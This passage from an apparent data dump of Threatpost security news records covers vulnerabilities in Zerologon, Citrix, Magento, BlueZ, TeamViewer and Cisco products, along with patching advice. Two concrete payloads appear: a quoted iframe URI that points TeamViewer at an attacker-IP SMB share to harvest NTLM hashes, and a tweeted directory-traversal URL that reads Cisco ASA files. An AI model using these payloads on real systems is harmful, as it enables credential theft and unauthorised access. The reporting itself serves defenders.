alert also comes [a week after Cisco Talos researchers warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n> MSTIC has observed activity by the nation-state actor MERCURY using the CVE-2020-1472 exploit (ZeroLogon) in active campaigns over the last 2 weeks. We strongly recommend patching. Microsoft 365 Defender customers can also refer to these detections: <https://t.co/ieBj2dox78>\n> \n> \u2014 Microsoft Security Intelligence (@MsftSecIntel) [October 5, 2020](<https://twitter.com/MsftSecIntel/status/1313246337153077250?ref_src=twsrc%5Etfw>)\n\nMicrosoft did not reveal further details of the MERCURY active exploitations in terms of victimology; however, a graph on its website shows that exploitation attempts (by attackers and red teams in general) started as early as Sept. 13 and have been ongoing ever since.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/06110502/1.png>)\n\nZerologon flaw attacker and red team activity. Credit: Microsoft\n\n\u201cOne of the adversaries noticed by our analysts was interesting because the attacker leveraged an older vulnerability for SharePoint (CVE-2019-0604) to exploit remotely unpatched servers (typically Windows Server 2008 and Windows Server 2012) and then implant a web shell to gain persistent access and code execution,\u201d said Microsoft [in an earlier analysis](<https://techcommunity.microsoft.com/t5/microsoft-365-defender/zerologon-is-now-detected-by-microsoft-defender-for-identity-cve/ba-p/1734034>). \u201cFollowing the web shell installation, this attacker quickly deployed a Cobalt Strike-based payload and immediately started exploring the network perimeter and targeting domain controllers found with the Zerologon exploit.\u201d\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n\n**[On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-06T15:51:12", "type": "threatpost", "title": "Microsoft Zerologon Flaw Under Attack By Iranian Nation-State Actors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-0604", "CVE-2020-1472", "CVE-2020-5135"], "modified": "2020-10-06T15:51:12", "id": "THREATPOST:51A2EB5F46817EF77631C9F4C6429714", "href": "https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:26:26", "description": "Proof-of-concept (PoC) exploit code has been released for an unpatched remote-code-execution vulnerability in the Citrix Application Delivery Controller (ADC) and Citrix Gateway products.\n\nThe vulnerability ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), which Threatpost [reported on in December,](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) already packs a double-punch in terms of severity: Researchers say it is extremely easy to exploit, and affects all supported versions of Citrix Gateway products and Citrix ADC, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web.\n\n\u201cThe vulnerability allows an unauthenticated remote attacker to execute arbitrary code on the system,\u201d said Qualys [researchers in an analysis last week](<https://blog.qualys.com/laws-of-vulnerabilities/2020/01/08/citrix-adc-and-gateway-remote-code-execution-vulnerability-cve-2019-19781>). \u201cOnce exploited, remote attackers could obtain access to private network resources without requiring authentication.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nA patch will not be available until late January, Citrix [has announced](<https://support.citrix.com/article/CTX267027>). That leaves various systems worldwide open to the flaw \u2014 and now, with PoC exploits available on GitHub, researchers expect exploit attempts to skyrocket.\n\n## Exploit PoC Code\n\nOver three weeks after CVE-2019-19781 was first [disclosed (on Dec. 17)](<https://support.citrix.com/article/CTX267027>), this past weekend PoC exploit code for [was released Friday by](<https://github.com/projectzeroindia/CVE-2019-19781>) \u201cProject Zero India,\u201d which describe themselves as \u201ca group of security researchers from India, inspired by Google\u2019s Project Zero.\u201d\n\nThe PoC exploit consists of two curl commands: One to write a template file which would include a user\u2019s shell command, and the second request to download the result of the command execution.\n\nAfter Project Zero India released its exploit, another PoC exploit was released by[ security research group TrustedSec.](<https://github.com/trustedsec/cve-2019-19781/>) This PoC was similar to the first, except it was written in Python and established a reverse shell.\n\nSecurity expert Kevin Beaumont, who dubbed the vulnerability \u201cShitrix,\u201d said on Twitter that the exploit PoC code means \u201cthis is going to get very messy.\u201d\n\nhttps://twitter.com/GossiTheDog/status/1215782882540695552\n\nIn addition, researchers have also[ released scanners](<https://github.com/trustedsec/cve-2019-19781>) and [honeypots](<https://github.com/MalwareTech/CitrixHoneypot>) to see if various servers are vulnerable to CVE-2019-19881.\n\n## The Flaw\n\nCitrix did not disclose many details about the vulnerability [in its security advisory](<https://support.citrix.com/article/CTX267027>), however, Qualys researchers said that the mitigation steps offered by Citrix suggest the flaw stems from the VPN handler failing to sufficiently sanitize user-supplied inputs.\n\n\u201cThe exploit attempt would include HTTP requests with \u2018/../\u2019 and \u2018/vpns/\u2019 in the URL. The responder policy rule checks for string \u201c/vpns/\u201d and if user is connected to the SSLVPN, and sends a 403 response,\u201d according to Qualys researchers.\n\nAccording to the Bad Packets Report, over 25,000 servers globally \u2014 with the most in the U.S., Germany and the UK \u2013 are vulnerable to CVE-2019-19781.\n\nhttps://twitter.com/bad_packets/status/1216635462011351040\n\nAffected by the vulnerability are: Citrix ADC and Citrix Gateway version 13.0 all supported builds, Citrix ADC and NetScaler Gateway version 12.1 all supported builds, Citrix ADC and NetScaler Gateway version 12.0 all supported builds, Citrix ADC and NetScaler Gateway version 11.1 all supported builds and Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds.\n\n## Mitigations\n\n\u201cCitrix expects to have firmware updates in the form of refresh builds to be available across all supported versions of Citrix ADC and Citrix Gateway before the end of January 2020,\u201d according to the Citrix security advisory.\n\nA patch will be released on Jan. 20 for Citrix ADC versions 11/12 and 13, while a patch for version 10 will be released Jan. 31, according to Citrix.\n\nIn the meantime, Citrix has released [mitigation steps](<https://support.citrix.com/article/CTX267679>) for CVE-2019-19781. Researchers are also urging customers to check their systems for exploit attempts using \u201cgrep\u201d for requests that contain \u201cvpns\u201d and \u201c..\u201d.\n\nSecurity experts like Dave Kennedy [took to Twitter](<https://twitter.com/HackingDave/status/1215800253246513155?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1215800253246513155&ref_url=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fproof-of-concept-code-published-for-citrix-bug-as-attacks-intensify%2F>) meanwhile to warn customers to apply mitigations until a patch is available.\n\n> Can\u2019t emphasize enough \u2013 please please please do the mitigation steps for the Citrix exploit as soon as possible. \n> \n> This is going to be a really bad one folks. \n> \n> Easy to automate and exploit and is widely used across the Internet.\n> \n> Mitigation here: <https://t.co/jeF0UC6A9V>\n> \n> \u2014 Dave Kennedy (ReL1K) (@HackingDave) [January 11, 2020](<https://twitter.com/HackingDave/status/1215800253246513155?ref_src=twsrc%5Etfw>)\n\nMikhail Klyuchnikov of Positive Technologies, Gianlorenzo Cipparrone and Miguel Gonzalez of Paddy Power Betfair plc were credited with finding the flaw.\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "cvss3": {}, "published": "2020-01-13T15:32:42", "type": "threatpost", "title": "Unpatched Citrix Flaw Now Has PoC Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2019-19881", "CVE-2020-5135"], "modified": "2020-01-13T15:32:42", "id": "THREATPOST:99610F4016AECF953EEE643779490F30", "href": "https://threatpost.com/unpatched-citrix-flaw-exploits/151748/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:29:14", "description": "The popular e-commerce platform Magento is urging web administrators to install its latest security update in order to defend against malicious attacks in the wild that could exploit a critical remote code-execution vulnerability.\n\nWhile the company didn\u2019t specify what kinds of potential attacks that websites should be concerned about (Threatpost reached out for comment on this), Magento is a common target for the [Magecart association of threat groups](<https://threatpost.com/magecart-groups-attack-simultaneous-sites-in-card-theft-frenzy/149872/>), which compromise websites built on unpatched e-commerce platforms in order to inject card-skimming scripts on checkout pages. The scripts steal unsuspecting customers\u2019 payment card details and other information entered into the fields on the page.\n\nThe vulnerability ([CVE-2019-8144](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8144>)), which carries a severity ranking of 10 out of 10 on the CVSS v.3 scale, could enable an unauthenticated user to insert a malicious payload into a merchant\u2019s site through Page Builder template methods, and execute it. Page Builder allows websites to design content updates, preview them live and schedule them to be published. The bug specifically exists in the preview function.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaw affects Magento 2.3, and was patched in in Magento Commerce 2.3.3 and with the security-only patch 2.3.2-p2, [released in October](<https://magento.com/security/patches/magento-2.3.3-and-2.2.10-security-update>). The company warned that patching will have the side effect of \u201cblocking administrators from viewing previews for products, blocks and dynamic blocks\u2019; but, it said it will re-enable the preview functionality as soon as possible.\n\n[](<https://register.gotowebinar.com/register/3127445778613605890?source=ART>)\n\n\u201cWe recommend that all merchants, even those who have already upgraded to 2.3.3 or applied security-only patch 2.3.2-p2, review the security of their Magento site to confirm that it was not potentially compromised before upgrade,\u201d Piotr Kaminski of the Magento security team wrote [in a posting](<https://magento.com/security/patches/latest-magento-security-update-helps-protect-recently-reported-rce-vulnerability>) on Monday. \u201cApplying this hot fix or upgrading\u2026will help defend your store against potential attacks going forward, but will not address the effects of an earlier attack.\u201d\n\nThe same update patches several other critical emote-execution flaws with a CVSS v.3 score of 9 and above, as well as cross-site scripting (CSS) issues.\n\nThe warning comes as Magecart activity and infrastructure continues to saturate the web. According to [analysis from RiskIQ](<https://threatpost.com/magecart-infestations-saturate-web/148911/>) last month, there are now 573 known command-and-control (C2) domains for the group, with close to 10,000 hosts actively loading those domains. In all, RiskIQ has detected almost 2 million (2,086,529) instances of Magecart\u2019s javaScript binaries, with over 18,000 e-commerce hosts directly breached.\n\n\u201cIt is unfortunate that this kind of attack is still succeeding even though a mitigation is quite straightforward,\u201d said Mounir Hahad, head of Juniper Threat Labs at Juniper Networks, via email. \u201cAs a last resort, website owners should periodically check the integrity of their script code, which can be as simple as calculating a checksum every few minutes to look for an unexpected change.\u201d\n\n**_What are the top risks to modern enterprises in the peak era of data breaches? Find out: Join breach expert Chip Witt from SpyCloud and Threatpost senior editor Tara Seals, in our upcoming free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_, \u201cTrends in Fortune 1000 Breach Exposure.\u201d _**[**_Click here to register_**](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)**_._**\n", "cvss3": {}, "published": "2019-11-12T18:13:18", "type": "threatpost", "title": "Magento Warns E-Commerce Sites to Upgrade ASAP to Prevent Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-8144", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2019-11-12T18:13:18", "id": "THREATPOST:CA33E204EC4B2286ECCDD9C58B908175", "href": "https://threatpost.com/magento-warns-upgrade-asap/150115/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T20:34:03", "description": "Google and Intel are warning of a high-severity flaw in BlueZ, the Linux Bluetooth protocol stack that provides support for core Bluetooth layers and protocols to Linux-based internet of things (IoT) devices.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nAccording to Google, the vulnerability affects users of Linux kernel versions before 5.9 that support BlueZ. BlueZ, which is an open-source project distributed under GNU General Public License (GPL), features [the BlueZ kernel](<http://www.bluez.org/about/>) that has been part of the official Linux kernel since version 2.4.6.\n\nThe flaw, which Google calls \u201cBleedingTooth,\u201d can be exploited in a \u201czero-click\u201d attack via specially crafted input, by a local, unauthenticated attacker. This could potentially allow for escalated privileges on affected devices.\n\n\u201cA remote attacker in short distance knowing the victim\u2019s bd [Bluetooth] address can send a malicious l2cap [Logical Link Control and Adaptation Layer Protocol] packet and cause denial of service or possibly arbitrary code execution with kernel privileges,\u201d according to a Google post [on Github](<https://github.com/google/security-research/security/advisories/GHSA-h637-c88j-47wq>). \u201cMalicious Bluetooth chips can trigger the vulnerability as well.\u201d\n\nThe flaw ([CVE-2020-12351](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12351>)) ranks 8.3 out of 10 on the CVSS scale, making it high-severity. It specifically stems from a heap-based type confusion in net/bluetooth/l2cap_core.c. A type-confusion vulnerability is a specific bug that can lead to out-of-bounds memory access and can lead to code execution or component crashes that an attacker can exploit. In this case, the issue is that there is insufficient validation of user-supplied input within the BlueZ implementation in Linux kernel.\n\nIntel, meanwhile, which has placed \u201csignificant investment\u201d in BlueZ,[ addressed the security issue](<https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00435.html>) in a Tuesday advisory, recommending that users update the Linux kernel to version 5.9 or later.\n\n\u201cPotential security vulnerabilities in BlueZ may allow escalation of privilege or information disclosure,\u201d according to the security advisory. \u201cBlueZ is releasing Linux kernel fixes to address these potential vulnerabilities.\u201d\n\nGoogle has also published proof-of-concept exploit code for the flaw on GitHub. See a video demo of BleedingTooth below:\n\nIntel also issued a fix for two medium-severity flaws that affect BlueZ, both of which stem from improper access control. That includes [CVE-2020-12352,](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12352>) which could enable an unauthenticated user to potentially enable information disclosure via adjacent access.\n\n\u201cA remote attacker in short distance knowing the victim\u2019s bd address can retrieve kernel-stack information containing various pointers that can be used to predict the memory layout and to defeat KASLR,\u201d according to [a description on GitHub](<https://github.com/google/security-research/security/advisories/GHSA-7mh3-gq28-gfrq>). \u201cThe leak may contain other valuable information such as the encryption keys.\u201d\n\nAnother flaw ([CVE-2020-24490](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24490>)) could allow an unauthenticated user to potentially enable denial of service via adjacent access. The flaw can be exploited by a remote attacker in short distance, who can broadcast extended advertising data and cause a denial-of-service state, or possibly arbitrary code execution with kernel privileges on victim machines (if they are equipped with Bluetooth 5 chips and are in scanning mode), according to Google.\n\nAndy Nguyen, security engineer with Google, was credited with discovering the flaw. Further details will soon be available on [Google\u2019s security blog](<https://security.googleblog.com>).\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce Threats.](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\u201d Magecart and other threat actors are riding the rising wave of online retail usage and racking up big numbers of consumer victims. Find out how websites can avoid becoming the next compromise as we go into the holiday season. Join us Wednesday, Oct. 14, 2-3 PM ET for this [LIVE ](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)webinar.**\n", "cvss3": {}, "published": "2020-10-14T13:37:13", "type": "threatpost", "title": "Google, Intel Warn on 'Zero-Click' Kernel Bug in Linux-Based IoT Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-12351", "CVE-2020-12352", "CVE-2020-24490", "CVE-2020-5135"], "modified": "2020-10-14T13:37:13", "id": "THREATPOST:CF4E8B0929D149A75E7512A74E569009", "href": "https://threatpost.com/google-intel-kernel-bug-linux-iot/160067/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:15:33", "description": "Popular remote-support software TeamViewer has patched a high-severity flaw in its desktop app for Windows. If exploited, the flaw could allow remote, unauthenticated attackers to execute code on users\u2019 systems or crack their TeamViewer passwords.\n\nTeamViewer is a proprietary software application used by businesses for remote-control functionalities, desktop sharing, online meetings, web conferencing and file transfer between computers. The recently discovered flaw stems from the Desktop for Windows app ([CVE-2020-13699](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13699>)) not properly quoting its custom uniform resource identifier (URI) handlers.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)Apps need to identify the URIs for the websites they will handle. But because handler applications can receive data from untrusted sources, the URI values passed to the application may contain malicious data that attempts to exploit the app. In this specific case, values are not \u201cquoted\u201d by the app \u2013 meaning that TeamViewer will treat them as commands rather than as input values.\n\n\u201cAn attacker could embed a malicious iframe in a website with a crafted URL (<iframe src=\u2019teamviewer10: \u2013play \\\\\\attacker-IP\\share\\fake.tvs\u2019>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,\u201d according [to an advisory](<https://jeffs.sh/CVEs/CVE-2020-13699.txt>) by Jeffrey Hofmann, security engineer at Praetorian, who disclosed the flaw.\n\nTo initiate the attack, the attacker could simply persuade a victim with TeamViewer installed on their system to click on crafted URL in a website \u2013 an opportunity for attackers to potentially [launch watering-hole attacks](<https://threatpost.com/watering-holes-asian-ethnic-flash-update-decoy/154323/>).\n\nThe URI will then trick the app into creating a connection with attacker-controlled remote Server Message Block (SMB) protocol. SMB is a network protocol used by Windows-based computers that allows systems within the same network to share files.\n\nAfter a victim\u2019s TeamViewer app initiates the remote SMB share, Windows will then make the connection using NT LAN Manager (NTLM). NTLM uses an encrypted protocol to authenticate a user without transferring the user\u2019s password. NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user\u2019s password.\n\nIn this attack scenario, the NTLM request can then be relayed by attackers using a tool like Responder, according to Hofmann. The Responder toolkit captures SMB authentication sessions on an internal network, and relays them to a target machine. This ultimately grants attackers access to the victim\u2019s machine, automatically. It also allows them to capture password hashes, which they can then crack via brute-force.\n\nFortunately for users, while the potential impact of this vulnerability is high, \u201cthe practical impact is low,\u201d Hofmann explained to Threatpost in an email. \u201cSuccessfully performing the attack is difficult and requires user interaction. There are a lot of prerequisites to exploit the vulnerability successfully. Every modern browser except for Firefox URL encodes spaces when handing off to URI handlers which effectively prevents this attack.\u201d\n\nThe flaw ranks 8.8 out of 10.0 on the CVSS scale, making it high severity. TeamViewer versions prior to 15.8.3 are vulnerable, and the bug affects various versions of TeamViewer, including: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 and tvvpn1.\n\nThe issue is fixed in 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3, said researchers.\n\nIn order to patch the flaw, \u201cWe implemented some improvements in URI handling relating to CVE 2020-13699,\u201d according to TeamViewer in a [statement sent to Threatpost](<https://community.teamviewer.com/t5/Announcements/Statement-on-CVE-2020-13699/td-p/98448>). \u201cThank you, Jeffrey Hofmann with Praetorian, for your professionalism and following a responsible disclosure model. We are grateful that you reached out to us and that you could confirm the fix of your findings in the latest release.\u201d\n\nIn a [security advisory regarding the flaw](<https://www.cisecurity.org/advisory/a-vulnerability-in-teamviewer-cloud-allow-for-offline-password-cracking_2020-106/>), the Center for Internet Security (CIS) recommended that TeamViewer users apply the appropriate patches. They also recommended that users avoid untrusted websites or links provided by unknown sources, and \u201ceducate users regarding threats posed by hypertext links contained in emails or attachments, especially from untrusted sources.\u201d\n\nTeamViewer\u2019s remote control functionalities make it a lucrative attack target for bad actors \u2013 especially with more enterprises turning to [collaboration apps like TeamViewer](<https://threatpost.com/beyond-zoom-safe-slack-collaboration-apps/154446/>) during the pandemic. In 2019, a targeted, email-borne attack against embassy officials and government finance authorities globally [weaponized TeamViewer](<https://threatpost.com/teamviewer-attacks-state-department/144014/>) to gain full control of the infected computer. And earlier in 2020, [a newly discovered variant](<https://threatpost.com/cerberus-trojan-major-spyware-targeted-attack/155415/>) of the Cerberus Android trojan was discovered with vastly expanded and more sophisticated info-harvesting capabilities, and the ability to run TeamViewer.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-10T15:56:13", "type": "threatpost", "title": "TeamViewer Flaw in Windows App Allows Password-Cracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-13699", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-08-10T15:56:13", "id": "THREATPOST:5C0EFAEECFC2925A0D89538F79EE561A", "href": "https://threatpost.com/teamviewer-fhigh-severity-flaw-windows-app/158204/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:16:17", "description": "A high-severity vulnerability in Cisco\u2019s network security software could lay bare sensitive data \u2013 such as WebVPN configurations and web cookies \u2013 to remote, unauthenticated attackers.\n\nThe flaw exists in the web services interface of Cisco\u2019s Firepower Threat Defense (FTD) software, which is part of its suite of network security and traffic management products; and its Adaptive Security Appliance (ASA) software, the operating system for its family of ASA corporate network security devices.\n\n\u201cAn attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device,\u201d according to a [Wednesday advisory from Cisco](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86>). \u201cA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2020-3452](<https://nvd.nist.gov/vuln/detail/CVE-2020-3452>)), which ranks 7.5 out of 10 on the CVSS scale, is due to a lack of proper input validation of URLs in HTTP requests processed by affected devices. Specifically, the vulnerability allows attackers to conduct directory traversal attacks, which is an HTTP attack enabling bad actors to access restricted directories and execute commands outside of the web server\u2019s root directory.\n\n\u201cThis vulnerability\u2026 is highly dangerous,\u201d said Mikhail Klyuchnikov of Positive Technologies, who was credited with independently reporting the flaw (along with Ahmed Aboul-Ela of RedForce), in a statement provided to Threatpost. \u201cThe cause is a failure to sufficiently verify inputs. An attacker can send a specially crafted HTTP request to gain access to the file system (RamFS), which stores data in RAM.\u201d\n\nA potential attacker can view files within the web services file system only. The web services file system is enabled for specific WebVPN and AnyConnect features (outlined in Cisco\u2019s advisory). The web services files that the attacker can view may have information such as WebVPN configuration, bookmarks, web cookies, partial web content and HTTP URLs.\n\nCisco said the vulnerability affects products if they are running a vulnerable release of Cisco ASA Software or Cisco FTD Software, with a vulnerable AnyConnect or WebVPN configuration: \u201cThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features,\u201d according to its advisory. However, \u201cthis vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\u201d\n\nTo eliminate the vulnerability, Klyuchnikov urged Cisco users to update Cisco ASA to the most recent version. Cisco said it\u2019s not aware of any malicious exploits for the vulnerability \u2013 however, it is aware of proof-of-concept (POC) exploit code [released Wednesday](<https://twitter.com/aboul3la>) by security researcher Ahmed Aboul-Ela.\n\n> Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.\n> \n> For example to read \"/+CSCOE+/portal_inc.lua\" file.\n> \n> https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n> \n> Happy Hacking! [pic.twitter.com/aBA3R7akkC](<https://t.co/aBA3R7akkC>)\n> \n> \u2014 Ahmed Aboul-Ela (@aboul3la) [July 22, 2020](<https://twitter.com/aboul3la/status/1286012324722155525?ref_src=twsrc%5Etfw>)\n\nEarlier in May, Cisco stomped out [12 high-severity vulnerabilities](<https://threatpost.com/cisco-fixes-high-severity-flaws-in-firepower-security-software-asa/155568/>) across its ASA and FTD network security products. The flaws could be exploited by unauthenticated remote attackers to launch an array of attacks \u2013 from denial of service (DoS) to sniffing out sensitive data.\n", "cvss3": {}, "published": "2020-07-23T19:49:49", "type": "threatpost", "title": "Cisco Network Security Flaw Leaks Sensitive Data", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3452", "CVE-2020-5135"], "modified": "2020-07-23T19:49:49", "id": "THREATPOST:C51D2F2366676BB018956D93916AC33E", "href": "https://threatpost.com/network-security-cisco-flaw-leaks-sensitive-data/157691/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-15T22:19:01", "description": "Cisco has patched a high-severity flaw in its NX-OS software, the network operating system used by Cisco\u2019s Nexus-series Ethernet switches.\n\nIf exploited, the vulnerability could allow an unauthenticated, remote attacker to bypass the input access control lists (ACLs) configured on affected Nexus switches \u2013 and launch a denial of service (DoS) attacks on the devices.\n\n\u201cA successful exploit could cause the affected device to unexpectedly decapsulate the IP-in-IP packet and forward the inner IP packet,\u201d according to Cisco\u2019s security advisory, [published on Monday](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ipip-dos-kCT9X4>). \u201cThis may result in IP packets bypassing input ACLs configured on the affected device or other security boundaries defined elsewhere in the network.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerability ([CVE-2020-10136](<https://nvd.nist.gov/vuln/detail/CVE-2020-10136>)) stems from the network stack of Cisco\u2019s NX-OS software. Specifically, it exists in a tunneling protocol called IP-in-IP encapsulation. This protocol allows IP packets to be encapsulated inside another IP packet. The IP-in-IP protocol on the affected software were accepting IP-in-IP packets from any source \u2014 to any destination \u2014 without explicit configuration between the specified source and destination IP addresses.\n\nAn attacker could exploit this issue by sending a crafted IP-in-IP packet to an affected device. Cisco said that under \u201ccertain conditions,\u201d the crafted packets could cause the network stack process to crash and restart multiple times \u2014 ultimately leading to DoS for affected devices.\n\nSpecifically impacted by the flaw are the Nexus 1000, 3000, 5500, 5600, 6000, 7000 and 9000 series, as well as Cisco Unified Computing System (UCS) 6200 and 06300 Series Fabric Interconnects (see a full list of affected models below). Users can also check whether their version of Cisco NX-OS is impacted using a [checking tool available on Cisco\u2019s advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ipip-dos-kCT9X4>).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/06/02110207/cisco-flaw.png>)\n\nUsers can update to the latest patch, and, \u201cif a device has the ability to disable IP-in-IP in its configuration, it is recommended that you disable IP-in-IP in all interfaces that do not require this feature,\u201d according to a [Tuesday CERT Coordination Center notice](<https://kb.cert.org/vuls/id/636397>). \u201cDevice manufacturers are urged to disable IP-in-IP in their default configuration and to require their customers to explicitly configure IP-in-IP as and when needed.\u201d\n\nProof-of-concept (PoC) exploit code was released for the bug by [Yannay Livneh](<https://github.com/CERTCC/PoC-Exploits/tree/master/cve-2020-10136>), who had also discovered the flaw.\n\n\u201cYou can use this code to verify if your device supports default IP-in-IP encapsulation from arbitrary sources to arbitrary destinations,\u201d said Livneh on GitHub. \u201cThe intended use of this code requires at least two more devices with distinct IP addresses for these two devices.\u201d\n\nCisco said it is \u201cnot aware of any public announcements or malicious use of the vulnerability.\u201d The vulnerability ranks 8.6 out of 10 on the CVSS scale, making it high severity.\n\nThe flaw [comes a week after Cisco announced](<https://threatpost.com/hackers-compromise-cisco-servers-saltstack/156091/>) that attackers were able to compromise its servers, after exploiting two known, critical[ SaltStack vulnerabilities](<https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/>). The flaws exist in the open-source Salt management framework, which are used in Cisco network-tooling products.\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 